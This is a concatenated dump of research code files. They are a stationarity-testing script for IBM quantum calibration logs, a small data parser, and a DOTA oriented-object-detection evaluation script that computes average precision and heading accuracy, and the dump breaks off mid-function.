model_speed = ModelSpeed(model_name)
time.sleep(1)
# different batch size
for bs in tqdm(batch_size):
fake_input_data_cl, fake_input_data_cf = give_fake_data(bs)
model_speed.test_time(fake_input_data_cl)
model_speed.sess.close()
model_speed_logs.to_csv('./result/tf_model_speed_experiments.csv', index = False)
``` |
{
"source": "137sc21/137_sc21",
"score": 2
} |
#### File: 137_sc21/src/KPSS_Individual_Analysis.py
```python
import os
import re
import warnings
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from statsmodels.tsa.stattools import adfuller
from statsmodels.tsa.stattools import kpss
warnings.simplefilter("ignore")
from datetime import datetime
T1_KPSS_dataframe = pd.DataFrame()
T2_KPSS_dataframe = pd.DataFrame()
Frequency_KPSS_dataframe = pd.DataFrame()
SQU3_KPSS_dataframe = pd.DataFrame()
Readout_KPSS_dataframe = pd.DataFrame()
CNOT_KPSS_dataframe = pd.DataFrame()
T1_ADF_dataframe = pd.DataFrame()
T2_ADF_dataframe = pd.DataFrame()
Frequency_ADF_dataframe = pd.DataFrame()
SQU3_ADF_dataframe = pd.DataFrame()
Readout_ADF_dataframe = pd.DataFrame()
CNOT_ADF_dataframe = pd.DataFrame()
appended_T1_adf =[]
appended_T1_kpss =[]
appended_T2_adf =[]
appended_T2_kpss =[]
appended_Frequency_adf =[]
appended_Frequency_kpss =[]
appended_SQU3_adf =[]
appended_SQU3_kpss =[]
appended_Readout_adf =[]
appended_Readout_kpss =[]
appended_CNOT_adf =[]
appended_CNOT_kpss =[]
def adf_test(timeseries):
# print('Results of Dickey-Fuller Test:')
dftest = adfuller(timeseries, autolag='AIC')
dfoutput = pd.Series(dftest[0:4], index=['Test Statistic', 'p-value', '#Lags Used',
'Number of Observations Used'])
for key, value in dftest[4].items():
dfoutput['Critical Value (%s)' % key] = value
return(dfoutput)
def kpss_test(timeseries):
# print('Results of KPSS Test:')
kpsstest = kpss(timeseries, regression='c')
kpss_output = pd.Series(kpsstest[0:3], index=['Test Statistic', 'p-value', 'Lags Used'])
for key, value in kpsstest[3].items():
kpss_output['Critical Value (%s)' % key] = value
# kpss_output = kpss_output.cumsum()
# dataframe=(kpss_output.to_frame().T)
# print(dataframe)
# dataframe.plot(kind='bar',y='p-value',x='timestamp',legend=False,figsize=(8,8),xlabel='ADF Statistical Test',ylabel='Value')
return(kpss_output)
macine_list = ["ibmq_16_melbourne.csv","ibmq_ourense.csv","ibmq_vigo.csv","ibmq_5_yorktown - ibmqx2"]
for machines in macine_list:
date_analysis = datetime.now().strftime("%Y_%m_%d-%I_%M_%S_%p")
machine_name=""
path = ".\\Log\\"
dirs = os.listdir(path)
pd.set_option('display.max_columns', None)
frame = pd.DataFrame()
df2 = pd.DataFrame()
Original_T1 =[]
Original_T2 =[]
Original_Frequency= []
Original_Readout =[]
Original_SQU3 = []
Original_CNOT_Keys=[]
Original_CNOT_Values=[]
Final_T1= []
Final_T2= []
Final_Frequncy= []
Final_Readout= []
Final_SQU3= []
Final_CNOT = []
for subdir in dirs:
subpath = os.listdir(path+subdir)
# print(subdir)
for files in subpath:
if files == machines:
name = machines.split(".")
machine_name = name[0]
# print(machine_name)
# if files == "ibmq_ourense.csv":
# if files == "ibmq_vigo.csv":
# if files == "ibmq_5_yorktown - ibmqx2.csv":
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
df = pd.read_csv(path+subdir+"\\"+files,index_col=None,header=0)
T1 = df.iloc[:,1]
T2 = df.iloc[:,2]
Freqency = df.iloc[:,3]
Readout = df.iloc[:,4]
SQU3 = df.iloc[:,5]
CNOT = df.iloc[:,6]
df.insert(0, 'timestamp', str(subdir))
df.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
# print(df)
df.index = df.timestamp
df = df.rename(columns={"Frecuency (GHz)": "Frequency (GHz)"})
# print(df)
# df.drop('Month', axis=1, inplace=True)
# df.iloc[:,1].plot()
for cnot_parts in CNOT:
cnot_key_value = re.split(',',str(cnot_parts))
for i in cnot_key_value:
# print("===================================================================")
# individual = str(i)
indivitual = re.split(':',i)
for keys in indivitual:
if keys.lower().startswith('nan'):
indivitual.remove(keys)
keys = keys.strip()
if keys.lower().startswith('cx'):
Original_CNOT_Keys.append(keys)
if isfloat(keys):
if np.isnan(float(keys)):
pass
else:
Original_CNOT_Values.append(keys)
T1_data = np.array(T1)
T2_data = np.array(T2)
Freqency_data= np.array(Freqency)
Readout_data = np.array(Readout)
SQU3_data = np.array(SQU3)
Original_T1.append(T1_data)
Original_T2.append(T2_data)
Original_Frequency.append(Freqency_data)
Original_Readout.append(Readout_data)
Original_SQU3.append(SQU3_data)
adf_res = adf_test(df['T1 (µs)'])
result = kpss_test(df['T1 (µs)'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_T1_kpss.append(stodataframe)
appended_T1_adf.append((stodataframe2))
adf_res = adf_test(df['T2 (µs)'])
result = kpss_test(df['T2 (µs)'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_T2_kpss.append(stodataframe)
appended_T2_adf.append((stodataframe2))
adf_res = adf_test(df['Frequency (GHz)'])
result = kpss_test(df['Frequency (GHz)'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_Frequency_kpss.append(stodataframe)
appended_Frequency_adf.append((stodataframe2))
adf_res = adf_test(df['Readout error'])
result = kpss_test(df['Readout error'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_Readout_kpss.append(stodataframe)
appended_Readout_adf.append((stodataframe2))
adf_res = adf_test(df['Single-qubit U3 error rate'])
result = kpss_test(df['Single-qubit U3 error rate'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_SQU3_kpss.append(stodataframe)
appended_SQU3_adf.append((stodataframe2))
adf_res = adf_test(Original_CNOT_Values)
result = kpss_test(Original_CNOT_Values)
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_CNOT_kpss.append(stodataframe)
appended_CNOT_adf.append((stodataframe2))
df['T1'] = df['T1 (µs)'] - df['T1 (µs)'].shift(1)
n = 7
df['T1'] = df['T1 (µs)'] - df['T1 (µs)'].shift(n)
df['T1_log'] = np.log(df['T1 (µs)'])
df['T1_log_diff'] = df['T1_log'] - df['T1_log'].shift(1)
# df['T1_log_diff'].dropna().plot()
df = df.replace(np.nan, 0)
# plt.polar(df['T1_log_diff'])
# adf_test(df['T1_log_diff'].dropna())
# kpss_test(df['T1_log_diff'].dropna())
# from pandas.plotting import scatter_matrix
# scatter_matrix(df2, alpha=0.2, figsize=(8, 8), diagonal="kde")
df['T1_log_diff']=df['T1_log_diff']
# print(df2)
#['Test Statistic', 'p-value', 'Lags Used']
# df2.plot(kind='line',y='p-value',x='timestamp',legend=True,figsize=(8,8),xlabel='ADF Statistical Test',ylabel='Value')
# print(df['T1_log_diff'])
# plt.hist(df2['p-value'])
# df2.dropna().plot()
# plt.show()
# plt.cla()
T1_KPSS_dataframe = pd.concat(appended_T1_kpss)
T1_ADF_dataframe = pd.concat(appended_T1_adf)
T2_KPSS_dataframe = pd.concat(appended_T2_kpss)
T2_ADF_dataframe = pd.concat(appended_T2_adf)
Frequency_KPSS_dataframe = pd.concat(appended_Frequency_kpss)
Frequency_ADF_dataframe = pd.concat(appended_Frequency_adf)
SQU3_KPSS_dataframe = pd.concat(appended_SQU3_kpss)
SQU3_ADF_dataframe = pd.concat(appended_SQU3_adf)
Readout_KPSS_dataframe = pd.concat(appended_Readout_kpss)
Readout_ADF_dataframe = pd.concat(appended_Readout_adf)
CNOT_KPSS_dataframe = pd.concat(appended_CNOT_kpss)
CNOT_ADF_dataframe = pd.concat(appended_CNOT_adf)
# dataframe = pd.concat(appended_data)
# dataframe2 = pd.concat(appended_data_adf)
# print(dataframe)
directory = date_analysis
parent_dir = "./Result/"+machine_name+"/"
path = os.path.join(parent_dir, directory)
os.mkdir(path)
# plt.show()
fig, axes = plt.subplots(nrows=3, ncols=2)
T1_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[0, 0], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='T1')
T2_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[0, 1], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='T2')
Readout_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[1, 0], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='Readout', ylabel='P-Value')
Frequency_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[1, 1], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='Frequency' )
SQU3_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[2, 0], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='SQU3')
CNOT_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[2, 1], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='CNOT')
# plt.savefig("./Result/" + machine_name + "/" + date_analysis + "/ALL_KPSS.png")
fig.tight_layout()
plt.savefig("./Result/" + machine_name + "/" + date_analysis + "/2019_ADF_KPSS.png")
img_path = "./Result/"+machine_name+"/"+date_analysis+"/"
img_dirs = os.listdir(img_path)
from PIL import Image
imageList = []
for files in img_dirs:
image = Image.open(str("./Result/"+machine_name+"/"+date_analysis+"/"+files))
im1 = image.convert('RGB')
imageList.append(im1)
im1.save(r"./Result/"+machine_name+"/"+date_analysis+"/ADF_KPSS_Result.pdf",save_all=True, append_images=imageList)
```
#### File: 137_sc21/src/Wait_Parser.py
```python
import pandas as pd
import os
basePath = os.path.dirname(os.path.abspath(__file__))
from io import StringIO
def CustomParser(data):
import json
j1 = json.loads(data)
return j1
lines = []
with open('Data/Analysis_Part_One/Athens') as f:
lines = (f.read().splitlines())
TESTDATA = StringIO(lines[0])
df = pd.DataFrame(lines)
df4 = pd.read_csv(TESTDATA,sep=",")
print(df4)
print(df4)
``` |
{
"source": "137xiaoyu/BBAVectors-Oriented-Object-Detection",
"score": 2
} |
#### File: my_tools/DOTA_devkit/dota_evaluation_task1.py
```python
import xml.etree.ElementTree as ET
import os
#import cPickle
import numpy as np
import matplotlib.pyplot as plt
import polyiou
from functools import partial
import cv2
def reorder_pts(tt, rr, bb, ll):
pts = np.asarray([tt,rr,bb,ll],np.float32)
l_ind = np.argmin(pts[:,0])
r_ind = np.argmax(pts[:,0])
t_ind = np.argmin(pts[:,1])
b_ind = np.argmax(pts[:,1])
tt_new = pts[t_ind,:]
rr_new = pts[r_ind,:]
bb_new = pts[b_ind,:]
ll_new = pts[l_ind,:]
return tt_new,rr_new,bb_new,ll_new
def ex_box_jaccard(a, b):
a = np.asarray(a, np.float32)
b = np.asarray(b, np.float32)
inter_x1 = np.maximum(np.min(a[:,0]), np.min(b[:,0]))
inter_x2 = np.minimum(np.max(a[:,0]), np.max(b[:,0]))
inter_y1 = np.maximum(np.min(a[:,1]), np.min(b[:,1]))
inter_y2 = np.minimum(np.max(a[:,1]), np.max(b[:,1]))
if inter_x1>=inter_x2 or inter_y1>=inter_y2:
return 0.
x1 = np.minimum(np.min(a[:,0]), np.min(b[:,0]))
x2 = np.maximum(np.max(a[:,0]), np.max(b[:,0]))
y1 = np.minimum(np.min(a[:,1]), np.min(b[:,1]))
y2 = np.maximum(np.max(a[:,1]), np.max(b[:,1]))
mask_w = np.int(np.ceil(x2-x1))
mask_h = np.int(np.ceil(y2-y1))
mask_a = np.zeros(shape=(mask_h, mask_w), dtype=np.uint8)
mask_b = np.zeros(shape=(mask_h, mask_w), dtype=np.uint8)
a[:,0] -= x1
a[:,1] -= y1
b[:,0] -= x1
b[:,1] -= y1
mask_a = cv2.fillPoly(mask_a, pts=np.asarray([a], 'int32'), color=1)
mask_b = cv2.fillPoly(mask_b, pts=np.asarray([b], 'int32'), color=1)
inter = np.logical_and(mask_a, mask_b).sum()
union = np.logical_or(mask_a, mask_b).sum()
iou = float(inter)/(float(union)+1e-12)
# cv2.imshow('img1', np.uint8(mask_a*255))
# cv2.imshow('img2', np.uint8(mask_b*255))
# k = cv2.waitKey(0)
# if k==ord('q'):
# cv2.destroyAllWindows()
# exit()
return iou
def cal_bbox_pts(pts_4):
x1 = np.min(pts_4[:,0])
x2 = np.max(pts_4[:,0])
y1 = np.min(pts_4[:,1])
y2 = np.max(pts_4[:,1])
bl = [x1, y2]
tl = [x1, y1]
tr = [x2, y1]
br = [x2, y2]
return np.asarray([bl, tl, tr, br], np.float32)
def parse_gt(filename):
"""
:param filename: ground truth file to parse
:return: all instances in a picture
"""
objects = []
with open(filename, 'r') as f:
while True:
line = f.readline()
if line:
splitlines = line.strip().split(' ')
object_struct = {}
if (len(splitlines) < 9):
continue
object_struct['name'] = splitlines[8]
if (len(splitlines) == 9):
object_struct['difficult'] = 0
elif (len(splitlines) == 10):
object_struct['difficult'] = int(splitlines[9])
object_struct['bbox'] = [float(splitlines[0]),
float(splitlines[1]),
float(splitlines[2]),
float(splitlines[3]),
float(splitlines[4]),
float(splitlines[5]),
float(splitlines[6]),
float(splitlines[7])]
# generate ground truth of theta: [0, 360)
# directional BBA vectors: pts from ann, ct from minAreaRect
ann_pts = np.asarray(object_struct['bbox'], np.float32).reshape((-1, 2))
pt_0 = ann_pts[0,:]
pt_1 = ann_pts[1,:]
direction_vec = (np.asarray(pt_0,np.float32)+np.asarray(pt_1,np.float32))/2
rect = cv2.minAreaRect(ann_pts)
(cen_x, cen_y), (bbox_w, bbox_h), theta = rect
ct = np.asarray([cen_x, cen_y], np.float32)
direction_vec = 100*(direction_vec - ct)
norm_direction_vec = np.linalg.norm(direction_vec)
direction_mask = float((direction_vec[1] >= 0))
theta = np.arccos(direction_vec[0]/norm_direction_vec)*direction_mask + \
(np.radians(360) - np.arccos(direction_vec[0]/norm_direction_vec))*(1 - direction_mask)
# # generate ground truth of direction
# # result direction: det_directional_BBAvec compared with det_BBAvec
# # gt direction: ann_directional_BBAvec compared with ann_BBAvec
# # ann_directional_BBAvec
# # directional BBA vectors: pts from ann, ct from minAreaRect
# ann_pts = np.asarray(object_struct['bbox'], np.float32).reshape((-1, 2))
# pt_0 = ann_pts[0,:]
# pt_1 = ann_pts[1,:]
# direction_vec = (np.asarray(pt_0,np.float32)+np.asarray(pt_1,np.float32))/2
# # ann_BBAvec
# # BBA vectors: pts from minAreaRect, ct from minAreaRect
# rect = cv2.minAreaRect(ann_pts)
# (cen_x, cen_y), (bbox_w, bbox_h), theta = rect
# ct = np.asarray([cen_x, cen_y], np.float32)
# pts_4 = cv2.boxPoints(((cen_x, cen_y), (bbox_w, bbox_h), theta)) # 4 x 2
# bl = pts_4[0,:]
# tl = pts_4[1,:]
# tr = pts_4[2,:]
# br = pts_4[3,:]
# tt = (np.asarray(tl,np.float32)+np.asarray(tr,np.float32))/2
# rr = (np.asarray(tr,np.float32)+np.asarray(br,np.float32))/2
# bb = (np.asarray(bl,np.float32)+np.asarray(br,np.float32))/2
# ll = (np.asarray(tl,np.float32)+np.asarray(bl,np.float32))/2
# # reorder BBA vectors
# if theta in [-90.0, -0.0, 0.0]: # (-90, 0]
# tt,rr,bb,ll = reorder_pts(tt,rr,bb,ll)
# cls_theta = 0
# jaccard_score = ex_box_jaccard(pts_4.copy(), cal_bbox_pts(pts_4).copy())
# if jaccard_score<0.95:
# cls_theta = 1
# tt_x = tt[0]*cls_theta + cen_x*(1 - cls_theta)
# tt_y = tt[1]*cls_theta + (cen_y - bbox_h)*(1 - cls_theta)
# rr_x = rr[0]*cls_theta + (cen_x + bbox_w)*(1 - cls_theta)
# rr_y = rr[1]*cls_theta + cen_y*(1 - cls_theta)
# bb_x = bb[0]*cls_theta + cen_x*(1 - cls_theta)
# bb_y = bb[1]*cls_theta + (cen_y + bbox_h)*(1 - cls_theta)
# ll_x = ll[0]*cls_theta + (cen_x - bbox_w)*(1 - cls_theta)
# ll_y = ll[1]*cls_theta + cen_y*(1 - cls_theta)
# tt = np.asarray([tt_x, tt_y], np.float32)
# rr = np.asarray([rr_x, rr_y], np.float32)
# bb = np.asarray([bb_x, bb_y], np.float32)
# ll = np.asarray([ll_x, ll_y], np.float32)
# # compute all BBA vectors and main direction vector
# tt = 100*(tt - ct)
# rr = 100*(rr - ct)
# bb = 100*(bb - ct)
# ll = 100*(ll - ct)
# direction_vec = 100*(direction_vec - ct)
# # compute cos and direction (0 to 3: tt rr bb ll)
# norm_tt = np.linalg.norm(tt)
# norm_rr = np.linalg.norm(rr)
# norm_bb = np.linalg.norm(bb)
# norm_ll = np.linalg.norm(ll)
# norm_direction_vec = np.linalg.norm(direction_vec)
# cos_tt = np.sum(tt*direction_vec)/norm_tt/norm_direction_vec
# cos_rr = np.sum(rr*direction_vec)/norm_rr/norm_direction_vec
# cos_bb = np.sum(bb*direction_vec)/norm_bb/norm_direction_vec
# cos_ll = np.sum(ll*direction_vec)/norm_ll/norm_direction_vec
# cos_all = np.asarray([cos_tt,cos_rr,cos_bb,cos_ll], np.float32)
# direction = np.argmax(cos_all)
# # another way (not recommended)
# center_pt_x = np.mean(np.array([float(splitlines[0]), float(splitlines[2]),
# float(splitlines[4]), float(splitlines[6])]))
# center_pt_y = np.mean(np.array([float(splitlines[1]), float(splitlines[3]),
# float(splitlines[5]), float(splitlines[7])]))
# direction_vec_x = (float(splitlines[0]) + float(splitlines[2]))/2 - center_pt_x
# direction_vec_y = (float(splitlines[1]) + float(splitlines[3]))/2 - center_pt_y
# if direction_vec_x >= 0 and direction_vec_y < 0:
# direction = 0 # tt
# elif direction_vec_x < 0 and direction_vec_y <= 0:
# direction = 3 # ll
# elif direction_vec_x <= 0 and direction_vec_y > 0:
# direction = 2 # bb
# elif direction_vec_x > 0 and direction_vec_y >= 0:
# direction = 1 # rr
# else:
# raise ValueError('direction error')
# object_struct['direction'] = int(direction)
object_struct['theta'] = theta
objects.append(object_struct)
else:
break
return objects
def voc_ap(rec, prec, use_07_metric=False):
""" ap = voc_ap(rec, prec, [use_07_metric])
Compute VOC AP given precision and recall.
If use_07_metric is true, uses the
VOC 07 11 point method (default:False).
"""
if use_07_metric:
# 11 point metric
ap = 0.
for t in np.arange(0., 1.1, 0.1):
if np.sum(rec >= t) == 0:
p = 0
else:
p = np.max(prec[rec >= t])
ap = ap + p / 11.
else:
# correct AP calculation
# first append sentinel values at the end
mrec = np.concatenate(([0.], rec, [1.]))
mpre = np.concatenate(([0.], prec, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def voc_eval(detpath,
annopath,
imagesetfile,
classname,
# cachedir,
ovthresh=0.5,
use_07_metric=False):
"""rec, prec, ap = voc_eval(detpath,
annopath,
imagesetfile,
classname,
[ovthresh],
[use_07_metric])
Top level function that does the PASCAL VOC evaluation.
detpath: Path to detections
detpath.format(classname) should produce the detection results file.
annopath: Path to annotations
annopath.format(imagename) should be the xml annotations file.
imagesetfile: Text file containing the list of images, one image per line.
classname: Category name (duh)
cachedir: Directory for caching the annotations
[ovthresh]: Overlap threshold (default = 0.5)
[use_07_metric]: Whether to use VOC07's 11 point AP computation
(default False)
"""
# assumes detections are in detpath.format(classname)
# assumes annotations are in annopath.format(imagename)
# assumes imagesetfile is a text file with each line an image name
# cachedir caches the annotations in a pickle file
# first load gt
#if not os.path.isdir(cachedir):
# os.mkdir(cachedir)
#cachefile = os.path.join(cachedir, 'annots.pkl')
# read list of images
with open(imagesetfile, 'r') as f:
lines = f.readlines()
imagenames = [x.strip() for x in lines]
#print('imagenames: ', imagenames)
#if not os.path.isfile(cachefile):
# load annots
recs = {}
for i, imagename in enumerate(imagenames):
#print('parse_files name: ', annopath.format(imagename))
recs[imagename] = parse_gt(annopath.format(imagename))
#if i % 100 == 0:
# print ('Reading annotation for {:d}/{:d}'.format(
# i + 1, len(imagenames)) )
# save
#print ('Saving cached annotations to {:s}'.format(cachefile))
#with open(cachefile, 'w') as f:
# cPickle.dump(recs, f)
#else:
# load
#with open(cachefile, 'r') as f:
# recs = cPickle.load(f)
# extract gt objects for this class
class_recs = {}
npos = 0
for imagename in imagenames:
R = [obj for obj in recs[imagename] if obj['name'] == classname]
bbox = np.array([x['bbox'] for x in R])
difficult = np.array([x['difficult'] for x in R]).astype(bool)
# directions = np.array([x['direction'] for x in R]).astype(np.int32)
thetas = np.array([x['theta'] for x in R]).astype(np.float32)
det = [False] * len(R)
npos = npos + sum(~difficult)
class_recs[imagename] = {'bbox': bbox,
'difficult': difficult,
# 'direction': directions,
'theta': thetas,
'det': det}
# read dets from Task1* files
detfile = detpath.format(classname)
with open(detfile, 'r') as f:
lines = f.readlines()
splitlines = [x.strip().split(' ') for x in lines]
image_ids = [x[0] for x in splitlines]
confidence = np.array([float(x[1]) for x in splitlines])
# directions = np.array([int(float(x[2])) for x in splitlines])
thetas = np.array([float(x[3]) for x in splitlines])
#print('check confidence: ', confidence)
BB = np.array([[float(z) for z in x[4:]] for x in splitlines])
# if no detected target
if BB.shape[0] == 0:
print('no ' + classname)
return 0, 0, 0, 0
# sort by confidence
sorted_ind = np.argsort(-confidence)
sorted_scores = np.sort(-confidence)
#print('check sorted_scores: ', sorted_scores)
#print('check sorted_ind: ', sorted_ind)
## note the usage only in numpy not for list
BB = BB[sorted_ind, :]
image_ids = [image_ids[x] for x in sorted_ind]
# directions = [directions[x] for x in sorted_ind]
thetas = [thetas[x] for x in sorted_ind]
#print('check imge_ids: ', image_ids)
#print('imge_ids len:', len(image_ids))
# go down dets and mark TPs and FPs
nd = len(image_ids)
tp = np.zeros(nd)
fp = np.zeros(nd)
t_direction = np.zeros(nd)
count = 0
for d in range(nd):
R = class_recs[image_ids[d]]
bb = BB[d, :].astype(float)
# direction = directions[d].astype(int)
theta = thetas[d].astype(float)
ovmax = -np.inf
BBGT = R['bbox'].astype(float)
# direction_gt = R['direction'].astype(int)
theta_gt = R['theta'].astype(float)
## compute det bb with each BBGT
if BBGT.size > 0:
# compute overlaps
# intersection
# 1. calculate the overlaps between hbbs, if the iou between hbbs are 0, the iou between obbs are 0, too.
# pdb.set_trace()
BBGT_xmin = np.min(BBGT[:, 0::2], axis=1)
BBGT_ymin = np.min(BBGT[:, 1::2], axis=1)
BBGT_xmax = np.max(BBGT[:, 0::2], axis=1)
BBGT_ymax = np.max(BBGT[:, 1::2], axis=1)
bb_xmin = np.min(bb[0::2])
bb_ymin = np.min(bb[1::2])
bb_xmax = np.max(bb[0::2])
bb_ymax = np.max(bb[1::2])
ixmin = np.maximum(BBGT_xmin, bb_xmin)
iymin = np.maximum(BBGT_ymin, bb_ymin)
ixmax = np.minimum(BBGT_xmax, bb_xmax)
iymax = np.minimum(BBGT_ymax, bb_ymax)
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = ((bb_xmax - bb_xmin + 1.) * (bb_ymax - bb_ymin + 1.) +
(BBGT_xmax - BBGT_xmin + 1.) *
(BBGT_ymax - BBGT_ymin + 1.) - inters)
overlaps = inters / uni
BBGT_keep_mask = overlaps > 0
BBGT_keep = BBGT[BBGT_keep_mask, :]
BBGT_keep_index = np.where(overlaps > 0)[0]
# pdb.set_trace()
def calcoverlaps(BBGT_keep, bb):
overlaps = []
for index, GT in enumerate(BBGT_keep):
overlap = polyiou.iou_poly(polyiou.VectorDouble(BBGT_keep[index]), polyiou.VectorDouble(bb))
overlaps.append(overlap)
return overlaps
if len(BBGT_keep) > 0:
overlaps = calcoverlaps(BBGT_keep, bb)
ovmax = np.max(overlaps)
jmax = np.argmax(overlaps)
# pdb.set_trace()
jmax = BBGT_keep_index[jmax]
if ovmax > ovthresh:
if not R['difficult'][jmax]:
if not R['det'][jmax]:
# compare direction
# if direction == direction_gt[jmax]:
# t_direction[d] = 1
# else:
# print(direction, direction_gt[jmax], bb, BBGT_keep, '\n')
# compare theta
if np.fabs((theta - theta_gt[jmax])) <= np.radians(30):
t_direction[d] = 1
# else:
# print(theta, theta_gt[jmax], bb, BBGT_keep, '\n')
tp[d] = 1.
R['det'][jmax] = 1
else:
fp[d] = 1.
else:
fp[d] = 1.
count = count + 1
# compute the accuracy of direction
t_direction = np.sum(t_direction)
if t_direction == 0:
acc_direction = float(0)
else:
acc_direction = t_direction / float(np.sum(tp))
# compute precision recall
print('check fp:', fp)
print('check tp', tp)
print('npos num:', npos)
fp = np.cumsum(fp)
tp = np.cumsum(tp)
rec = tp / float(npos)
# avoid divide by zero in case the first detection matches a difficult
# ground truth
prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
ap = voc_ap(rec, prec, use_07_metric)
return rec, prec, ap, acc_direction
def main():
# ##TODO: wrap the code in the main
# detpath = r'/home/dingjian/Documents/Research/experiments/light_head_faster_rotbox_best_point/Task1_results_0.1_nms_epoch18/results/Task1_{:s}.txt'
# annopath = r'/home/dingjian/code/DOTA/DOTA/media/OrientlabelTxt-utf-8/{:s}.txt'# change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
# imagesetfile = r'/home/dingjian/code/DOTA/DOTA/media/testset.txt'
# classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
# 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']
detpath = r'D:\\137\\workspace\\python_projects\\BBAVectors-Oriented-Object-Detection\\result_dota\\Task1_{:s}.txt'
annopath = r'D:\\137\\dataset\\MunichDatasetVehicleDetection-2015-old\\DOTA_TrainVal\\labelTxt\\{:s}.txt' # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
imagesetfile = r'D:\\137\\dataset\\MunichDatasetVehicleDetection-2015-old\\DOTA_TrainVal\\valset.txt'
# annopath = r'D:\\137\\dataset\\MunichDatasetVehicleDetection-2015-old\\DOTA_All\\labelTxt\\{:s}.txt' # change the directory to the path of val/labelTxt, if you want to do evaluation on the valset
# imagesetfile = r'D:\\137\\dataset\\MunichDatasetVehicleDetection-2015-old\\DOTA_All\\valset.txt'
# For DOTA-v1.5
# classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
# 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter', 'container-crane']
# For DOTA-v1.0
# classnames = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field', 'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
# 'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout', 'harbor', 'swimming-pool', 'helicopter']
classnames = ['pkw', 'pkw_trail', 'truck', 'truck_trail', 'van_trail', 'cam', 'bus']
classaps = []
class_acc = []
map = 0
